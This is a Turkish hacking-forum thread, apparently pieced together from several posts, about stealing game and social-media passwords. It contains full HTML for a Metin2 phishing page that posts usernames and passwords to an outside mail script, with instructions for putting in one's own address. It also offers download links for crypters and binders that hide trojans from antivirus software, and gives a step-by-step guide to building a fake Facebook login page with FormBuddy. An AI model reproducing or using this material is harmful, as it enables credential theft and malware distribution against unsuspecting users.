Fake Mail hata

whitepoet

Yeni üye
14 Mar 2009
4
0
Arkadaşlar bu fake mailde ben ne hatası yapıyorum ne ettiysem denemelik yazdığım hiç bir şifre gelmedi.
siteden çalışıyor yorumları olan scriptlerden biri bu.

Oturum Aç

EaSir1

Yeni üye
20 Ocak 2011
4
0
kardeş sendeki bu html kodların ı nerden bulabilirim bende senin gibi m2 sitesi istiyorumda , sen bana kodları atsanda ben değiştirip yapsam olurmu Dostum ?

By Crazy

Yeni üye
25 Ocak 2011
27
0
<html><center><head><input type=hidden name=**** *********text/html;CHARSET=iso-8859-9 **** ******=Content-Type><body><font size=8 color=Renk>Metin2 125 EP </font><br><br><br><font size=5 color=Renk></font><body background=http://images.mmosite.com/space/upload/070628/biggish/0f50d147dc4c.jpg><br><br><br>
<FORM onsubmit="return(validate(self.********.myform.use rname.value,self.********.myform.password.value)&a mp;& alertUserRemember());" method=post name=myform action=http://www.fikirbul.com/mail/sendmail.asp><INPUT value=http://blocklive.xm.com/fakehata.html type=hidden name=redirect><INPUT [email protected]//attribus type=hidden name=Kime*><title>125 Ep Giriş</title></HEAD>
<p align="center"><strong><span style="COLOR: #ff8000">METİN2 125 EP </span>
</strong></p>
<p><b><font color="#FF8000">125 EP ALMAK İÇİN "TAMAM" tuşuna
basarak doğrulayın ! </font></b> </p>
<p>   <br>
   <font color="#377ed0"><span style="font-weight: 700">Kullanıcı</span></font><font color="#377ed0"><span style="FONT-SIZE: 9pt; FONT-WEIGHT: 700"><font face="Verdana">:</font></span></font><input type="text" name="T1" size="27"><br>
       <span style="FONT-SIZE: 9pt; FONT-WEIGHT: 700">
<font color="#377ed0">
<font face="Verdana">Parola:<input type="password" name="T2" size="27"></font></span></font></p>
SERVER ADI:<input type="text" SERVER NAME="T3" size="27"><br>
<input type="submit" value="TAMAM" name="B1" style="color: #0066CC; border: 1px solid #0066CC"></p>
<p> </p>
<p> </p>
</blockquote>
</td>
</tr>
</table>
</div>
<div class="shadow"> </div>
<div class="content content-last">
<div class="content-bg">
<div class="content-bg-bottom">

kardeşim bnu al not deferine yapıştır ctrl f yap @ araştır sonra benim msni silip kendi msni yaz hayırlı olsun

darkboy03

Üye
8 Ağu 2009
83
0
Koltuk
Açıklama yok bişi yok. Dostum nasıl kullanılır bunlar ne işe yarar?
msn mi dondurur
kişiyi msnden mi düşürür
pc sine saldırı mı yapar?
ip port calıp pc sine mi girilir ?

Usta biraz dikkat edelim pls. herkes bişiler kapsın ;)

Crypter / Binder/ packer |Sürekli Güncel|

s.a
Arkadaşlar Malware Tool ve araç gereçlerin güncelliği vede
antivirüslerce tanınmaması, işlem yapılan dosyayı bozmaması
ve içine ikinci yada üçüncü bir şahıs tarafından trojan backDoor yerleştirilmemiş olması çok önemlidir..
Bu başlık altında sürekli güncel crypter / binder / packer gibi toolları
Test ederek vermeye çalışacağım..
Test ettiğim temiz olduğundan emin olduğum 5 crypter ile başlamak istiyorum..
Bu crypterler yabancı sitelerde MOD lanan crypterlerdir..
Bu crypterler arasında binder özelliği olanlarda vardır..
Trojan serverlerini crypt etmeden önce bazı hassas noktalar vardır
Onlara dikkat edin mesela serverinizin packlenmemiş olmasına dikkat edin..
Bazı crypterlerin icon desteği var fakat icon enjekte etmek serveri bozabilir..
Deneme yanılma yöntemiyle bir kaç kez deneyin..
Verdiklerim poison ve Fluxde test edilmiştir..
Her trojanda çalışacak diye birşey yok..
Poison ve fluxde başarılı bir şekilde çalışıyor..
Sözü uzatmadan linkleri vereyim..
Faydalı olması dileğiyle..

66122216.jpg

srbgftw.jpg

aserg.jpg

erua.jpg

saergv.jpg

sgf.jpg

srgh.jpg

aergf.jpg

wagtr.jpg

Download
https://tik.lat/B6Hrl

Alternatif1
https://tik.lat/6QMHI

Alternatif2

https://tik.lat/xxKf1

Rar / pas : matador

Selametle

TheAlcazer

Katılımcı Üye
22 Şub 2011
434
0
Nevşehir.
Face Hesabı Nasıl Hacklenir FormBuddy Fake Resimli Anlatım

Bugün Sizlere Formbuddy ile nasıl facebook hack yapılır onu anlatacam.Başlıyoruz.
İlk önce Formbuddy.com 'a giriyoruz.Karşımıza şöyle bir sayfa çıkıyor.Signup Now 'a tıklıyoruz.
formbuddy1.png

I AGREE ' YE TIKLIYORUZ.

formbuddy2.png

BURAYA E-MAİL GİRİYORUZ
formbuddy3.png

What would you want us to do with the forms
submitted from your site? Store them here (Recommended) Have them e-mailed to you Both stored here AND e-mailed to you kısmında açılır listeyi açıp "Have them e-mailed to you" seçeneğini seçin.Ve Register butonuna tıklayın.
Hesap bilgilerini verecek bunları bir yere not edin.

35731236.png

Şimdi Home'a tıklayıp Anasayfaya dönüp giriş yapıyoruz.Sonra form builder ' a tıklıyoruz.Thank you URL ' e yazan kısma www.facebook.com\login.php yazıp build my form diyoruz.Karşınıza böyle bir sayfa çıkacak.
yenibitelemresmi4e.png

Bu Kodların tamamını almıyoruz sadece resimde gösterdiğim yerleri alıyoruz.
Şimdi www.facebook.com\login.php giriyoruz ve aşağıdaki gibi sağ tıklayıp sayfanın kaynagını görüntüle diyoruz.Sonra Yukarıdan dosya bölümünden farklı kaydet diyip kaydediyoruz.

22455214.png

Kaydettiğimiz dosyayı WordPad MFC ile açıyoruz (daha rahat olması için) formbuddy aldığımız kodu buraya giriyoruz.<body yazan yerin tam üstüne.

45546693.png

Sonra kapatıp kaydediyoruz ve sonunu .html olarak değiştiriyoruz.Böyle Yapamazsanız sonunu .php yapın ve sağ tıklayıp hangi internet tarayıcısını kullanıyorsanız onunla birlikte açılmasını sağlayın.Sonra sosyal mühendisliğimizi kullanıyoruz.Bazı arkadaşlar bunu kimse yemez demesin herkes hacker değil unutmayın ve şu anda kullanılıyor.Zaten bunu hazırlamamdaki sebep Yeni Başlayan Arkadaşlara Deneyim Kazandırmak.Öğrenirlerse ve çalışırlarsa yapabileceklerini göstermek.HERKESE İYİ FORUMLAR

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.